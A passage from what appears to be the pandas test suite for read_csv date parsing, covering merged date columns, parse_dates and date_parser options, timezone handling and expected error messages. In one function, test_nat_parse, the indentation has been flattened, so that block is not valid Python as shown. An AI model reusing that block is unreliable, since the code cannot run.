         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
                "X3", "X4", "X5", "X6", "X7", "X8"])
    if not keep_date_col:
        # Source columns X1-X3 are consumed by the merge and dropped.
        expected = expected.drop(["X1", "X2", "X3"], axis=1)
    elif parser.engine == "python":
        # The Python engine keeps the raw date column as int64, not str.
        expected["X1"] = expected["X1"].astype(np.int64)
    tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
    """A parsed date column can simultaneously act as the index column."""
    data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None, prefix="X",
                             parse_dates=[1], index_col=1)
    # Column 1 ("X1") becomes the parsed index and disappears from the data.
    index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
                   datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
                   datetime(1999, 1, 27, 22, 0)], name="X1")
    expected = DataFrame([
        ["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
        ["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
        ["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
        ["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
        ["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
    ], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
    """Merged date columns parse correctly even though the raw date field
    ("19990127") is integer-like and passes through ``parse_date_time``."""
    data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
            "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
            "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
            "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
            "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
            "KORD,19990127, 23:00:00, 22:56:00, -0.5900")
    parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None,
                             date_parser=conv.parse_date_time,
                             parse_dates=parse_dates, prefix="X")
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", 0.81],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", 0.01],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", -0.99],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", -0.59],
    ], columns=["actual", "nominal", "X0", "X4"])
    # The aggregated column order can vary, so standardize it.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
    """A callable like Timestamp can serve as date_parser for a
    combined [[0, 1]] date/time column pair."""
    parser = all_parsers
    data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""
    result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
                             header=None, date_parser=Timestamp)
    expected = DataFrame([
        [Timestamp("05/31/2012, 15:30:00.029"),
         1306.25, 1, "E", 0, np.nan, 1306.25],
        [Timestamp("05/31/2012, 15:30:00.029"),
         1306.25, 8, "E", 0, np.nan, 1306.25]
    ], columns=["0_1", 2, 3, 4, 5, 6, 7])
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
    """parse_dates={"nominal": [1, 2]} merges the named header columns
    into one parsed datetime column placed first in the frame."""
    parser = all_parsers
    data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
    result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,parse_dates,msg", [
    ("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
                                        "in dict date_NominalTime")),
    ("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
    """Combining date columns must fail loudly when the generated (or
    requested) column name collides with an existing column."""
    parser = all_parsers
    with pytest.raises(ValueError, match=msg):
        parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
    """A unix-seconds index column must reach date_parser as a value
    that survives int() conversion (regression for int-cast bug)."""
    parser = all_parsers
    data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
            "accountid,userid,contactid,level,silo,method\n"
            "1343103150,0.062353,0,4,6,0.01690,3,"
            "12345,1,-1,3,invoice_InvoiceResource,search\n")
    result = parser.read_csv(
        StringIO(data), index_col=0, parse_dates=[0],
        date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
    expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
                           3, "invoice_InvoiceResource", "search"]],
                         columns=["elapsed", "sys", "user", "queries",
                                  "query_time", "rows", "accountid",
                                  "userid", "contactid", "level",
                                  "silo", "method"],
                         index=Index([Timestamp("2012-07-24 04:12:30")],
                                     name="posix_timestamp"))
    tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
parser = all_parsers
df = DataFrame(dict({"A": np.asarray(lrange(10), dtype="float64"),
"B": pd.Timestamp("20010101")}))
df.iloc[3:6, :] = np.nan
with tm.ensure_clean("__nat_parse_.csv") as path:
df.to_csv(path)
result = parser.read_csv(path, index_col=0, parse_dates=["B"])
tm.assert_frame_equal(result, df)
def test_csv_custom_parser(all_parsers):
    """A custom %Y%m%d date_parser should match the default parsing of
    an implicit date index (parse_dates=True)."""
    data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    parser = all_parsers
    result = parser.read_csv(
        StringIO(data),
        date_parser=lambda x: datetime.strptime(x, "%Y%m%d"))
    expected = parser.read_csv(StringIO(data), parse_dates=True)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
    """With parse_dates=True and no index_col, the first column is
    implicitly used as the parsed date index."""
    csv_text = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    parser = all_parsers
    # Explicitly indexing column 0 must be equivalent to the implicit form.
    expected = parser.read_csv(StringIO(csv_text), index_col=0,
                               parse_dates=True)
    result = parser.read_csv(StringIO(csv_text), parse_dates=True)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
    """index_col and parse_dates may both name a column by its string
    label; the column becomes a parsed DatetimeIndex."""
    data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), index_col="date",
                             parse_dates=["date"])
    index = date_range("1/1/2009", periods=3)
    index.name = "date"
    expected = DataFrame({"A": ["a", "b", "c"], "B": [1, 3, 4],
                          "C": [2, 4, 5]}, index=index)
    tm.assert_frame_equal(result, expected)
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
    [["date", "time"]],
    [[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
    """Two-digit year-first dates (090131) should parse as 2009-01-31;
    xfails because read_csv does not expose a yearfirst option."""
    data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), index_col=0,
                             parse_dates=parse_dates)
    index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
                           datetime(2009, 2, 28, 10, 20, 0),
                           datetime(2009, 3, 31, 8, 30, 0)],
                          dtype=object, name="date_time")
    expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
    """parse_dates accepts positional or label column lists; with
    dayfirst=True, 15/02/2010 parses as Feb 15."""
    data = "a,b,c\n01/01/2010,1,15/02/2010"
    parser = all_parsers
    expected = DataFrame({"a": [datetime(2010, 1, 1)], "b": [1],
                          "c": [datetime(2010, 2, 15)]})
    expected = expected.set_index(["a", "b"])
    result = parser.read_csv(StringIO(data), index_col=[0, 1],
                             parse_dates=parse_dates, dayfirst=True)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
    """parse_dates=True applies to the datetime level of a MultiIndex,
    regardless of the order index columns are requested in."""
    data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
    parser = all_parsers
    index = MultiIndex.from_product([
        (datetime(2009, 1, 1), datetime(2009, 1, 2),
         datetime(2009, 1, 3)), ("one", "two", "three")],
        names=["index1", "index2"])
    # Out of order.
    if index_col == [1, 0]:
        index = index.swaplevel(0, 1)
    expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
                         columns=["A", "B", "C"], index=index)
    result = parser.read_csv(StringIO(data), index_col=index_col,
                             parse_dates=True)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [
    dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
    """A dayfirst-aware custom date_parser parses European dates; the
    misspelled kwarg day_first must raise TypeError from parse_date."""
    parser = all_parsers
    data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
    if "dayfirst" in kwargs:
        df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                             date_parser=lambda d: parse_date(d, **kwargs),
                             header=0, index_col=0, parse_dates=True,
                             na_values=["NA"])
        exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
                           datetime(2010, 2, 2)], name="time")
        expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
                             index=exp_index, columns=["Q", "NTU"])
        tm.assert_frame_equal(df, expected)
    else:
        msg = "got an unexpected keyword argument 'day_first'"
        with pytest.raises(TypeError, match=msg):
            parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                            date_parser=lambda d: parse_date(d, **kwargs),
                            skiprows=[0], index_col=0, parse_dates=True,
                            na_values=["NA"])
def test_parse_tz_aware(all_parsers):
    """ISO-8601 timestamps with a Z suffix parse to a UTC-aware index."""
    # See gh-1693
    parser = all_parsers
    data = "Date,x\n2012-06-13T01:39:00Z,0.5"
    result = parser.read_csv(StringIO(data), index_col=0,
                             parse_dates=True)
    expected = DataFrame({"x": [0.5]}, index=Index([Timestamp(
        "2012-06-13 01:39:00+00:00")], name="Date"))
    tm.assert_frame_equal(result, expected)
    assert result.index.tz is pytz.utc
@pytest.mark.parametrize("parse_dates,index_col", [
    ({"nominal": [1, 2]}, "nominal"),
    ({"nominal": [1, 2]}, 0),
    ([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
    """A combined date column may be selected as index by name or by
    position; the list-form spelling auto-names it date_NominalTime."""
    parser = all_parsers
    data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    expected = expected.set_index("nominal")
    if not isinstance(parse_dates, dict):
        expected.index.name = "date_NominalTime"
    result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
                             index_col=index_col)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
    """Combined date columns and an index must survive chunked reading
    (chunksize=2) identically to a single-shot read."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
    expected = expected.set_index("nominal")
    reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
                             index_col="nominal", chunksize=2)
    chunks = list(reader)
    tm.assert_frame_equal(chunks[0], expected[:2])
    tm.assert_frame_equal(chunks[1], expected[2:4])
    tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
    """Specifying the combined columns by position or by label must
    produce identical frames."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    with_indices = parser.read_csv(StringIO(data),
                                   parse_dates={"nominal": [1, 2]},
                                   index_col="nominal")
    with_names = parser.read_csv(StringIO(data), index_col="nominal",
                                 parse_dates={"nominal": [
                                     "date", "nominalTime"]})
    tm.assert_frame_equal(with_indices, with_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
    """Using the combined date column inside a MultiIndex is equivalent
    to combining first and calling set_index afterwards."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
                             parse_dates={"nominal": [1, 2]})
    expected = parser.read_csv(StringIO(data),
                               parse_dates={"nominal": [1, 2]})
    expected = expected.set_index(["nominal", "ID"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
    """A scalar string for parse_dates must raise TypeError, with or
    without index_col."""
    # see gh-5636
    parser = all_parsers
    msg = ("Only booleans, lists, and dictionaries "
           "are accepted for the 'parse_dates' parameter")
    data = """A,B,C
1,2,2003-11-1"""
    with pytest.raises(TypeError, match=msg):
        parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
@pytest.mark.parametrize("parse_dates", [
    (1,), np.array([4, 5]), {1, 3, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
    """Non-bool/list/dict parse_dates values (tuple, ndarray, set)
    must raise TypeError.

    Bug fix: the call previously hard-coded ``parse_dates=(1,)``, so
    the parametrized ndarray and set cases were never exercised; pass
    the parametrized value through instead.
    """
    parser = all_parsers
    msg = ("Only booleans, lists, and dictionaries "
           "are accepted for the 'parse_dates' parameter")
    data = """A,B,C
1,2,2003-11-1"""
    with pytest.raises(TypeError, match=msg):
        parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_parse_dates_empty_string(all_parsers):
    """An empty field in a parsed date column becomes NaT even with
    na_filter disabled."""
    # see gh-2263
    parser = all_parsers
    data = "Date,test\n2012-01-01,1\n,2"
    result = parser.read_csv(StringIO(data), parse_dates=["Date"],
                             na_filter=False)
    expected = DataFrame([[datetime(2012, 1, 1), 1], [pd.NaT, 2]],
                         columns=["Date", "test"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
    ("a\n04.15.2016", dict(parse_dates=["a"]),
     DataFrame([datetime(2016, 4, 15)], columns=["a"])),
    ("a\n04.15.2016", dict(parse_dates=True, index_col=0),
     DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
    ("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
     DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
               columns=["a", "b"])),
    ("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
     DataFrame(index=MultiIndex.from_tuples(
         [(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
    """thousands="." must not strip the dots out of date strings like
    04.15.2016 before they are parsed."""
    # see gh-14066
    parser = all_parsers
    result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
    tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
    """Combining date/time columns works under a two-row header; the
    remaining columns keep their tuple labels."""
    data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=[0, 1],
                             parse_dates={"date_time": [0, 1]},
                             date_parser=conv.parse_date_time)
    expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
                     [datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
    expected = DataFrame(expected_data,
                         columns=["date_time", ("A", "a"), ("B", "b")])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
    ("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
     DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
                [datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
               columns=["date_time", "a", "b"])),
    (("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
      "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
      "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
      "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
      "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
      "KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
     dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
     DataFrame([
         [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
          "KORD", 0.81],
         [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
          "KORD", 0.01],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
          "KORD", -0.99],
         [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
          "KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
    """conv.parse_date_time combines separate date and time fields,
    with and without a header row."""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
                             **kwargs)
    # Python can sometimes be flaky about how
    # the aggregated columns are entered, so
    # this standardizes the order.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
    """conv.parse_date_fields assembles year/month/day columns into a
    single datetime column."""
    parser = all_parsers
    data = ("year,month,day,a\n2001,01,10,10.\n"
            "2001,02,1,11.")
    result = parser.read_csv(StringIO(data), header=0,
                             parse_dates={"ymd": [0, 1, 2]},
                             date_parser=conv.parse_date_fields)
    expected = DataFrame([[datetime(2001, 1, 10), 10.],
                          [datetime(2001, 2, 1), 11.]], columns=["ymd", "a"])
    tm.assert_frame_equal(result, expected)
def test_parse_date_all_fields(all_parsers):
    """conv.parse_all_fields assembles six y/m/d/H/M/S columns into a
    single datetime column."""
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
    """Fractional seconds in the seconds field survive as datetime
    microseconds when combined via conv.parse_all_fields."""
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=123456), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=500000), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
    """Any user callable can combine a subset of columns; leftover
    columns (day) remain in the output untouched."""
    parser = all_parsers
    data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."
    result = parser.read_csv(StringIO(data), header=0,
                             parse_dates={"ym": [0, 1]},
                             date_parser=lambda y, m: date(year=int(y),
                                                           month=int(m),
                                                           day=1))
    expected = DataFrame([[date(2001, 1, 1), 10, 10.],
                          [date(2001, 2, 1), 1, 11.]],
                         columns=["ym", "day", "a"])
    tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
    """A date_parser returning second-resolution datetime64 values must
    be respected instead of being coerced to nanoseconds."""
    # see gh-10245
    parser = all_parsers
    data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
    def date_parser(dt, time):
        # Build datetime64[s] values directly from the two text fields.
        return np_array_datetime64_compat(dt + "T" + time + "Z",
                                          dtype="datetime64[s]")
    result = parser.read_csv(StringIO(data), date_parser=date_parser,
                             parse_dates={"datetime": ["date", "time"]},
                             index_col=["datetime", "prn"])
    datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
                                           dtype="datetime64[s]")
    expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
                         index=MultiIndex.from_tuples(
                             [(datetimes[0], 126), (datetimes[1], 23),
                              (datetimes[2], 13)], names=["datetime", "prn"]))
    tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
    """A whitespace-only field in a parse_dates column stays a string
    and leaves the column unparsed."""
    # see gh-6428
    parser = all_parsers
    data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "
    result = parser.read_csv(StringIO(data), parse_dates=["opdate"])
    expected_data = [[7, "10/18/2006"],
                     [7, "10/18/2008"],
                     [621, " "]]
    expected = DataFrame(expected_data, columns=["case", "opdate"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,expected", [
    ("a\n135217135789158401\n1352171357E+5",
     DataFrame({"a": [135217135789158401,
                      135217135700000]}, dtype="float64")),
    ("a\n99999999999\n123456789012345\n1234E+0",
     DataFrame({"a": [99999999999,
                      123456789012345,
                      1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
    """Float precision must be preserved when date parsing fails and
    the numeric column is left untouched."""
    # see gh-2697
    #
    # Date parsing should fail, so we leave the data untouched
    # (i.e. float precision should remain unchanged).
    parser = all_parsers
    result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
    tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
    """Timestamps with a fixed +09:00 offset parse to a tz-aware
    DatetimeIndex with that offset."""
    # see gh-22256
    parser = all_parsers
    data = """dt,val
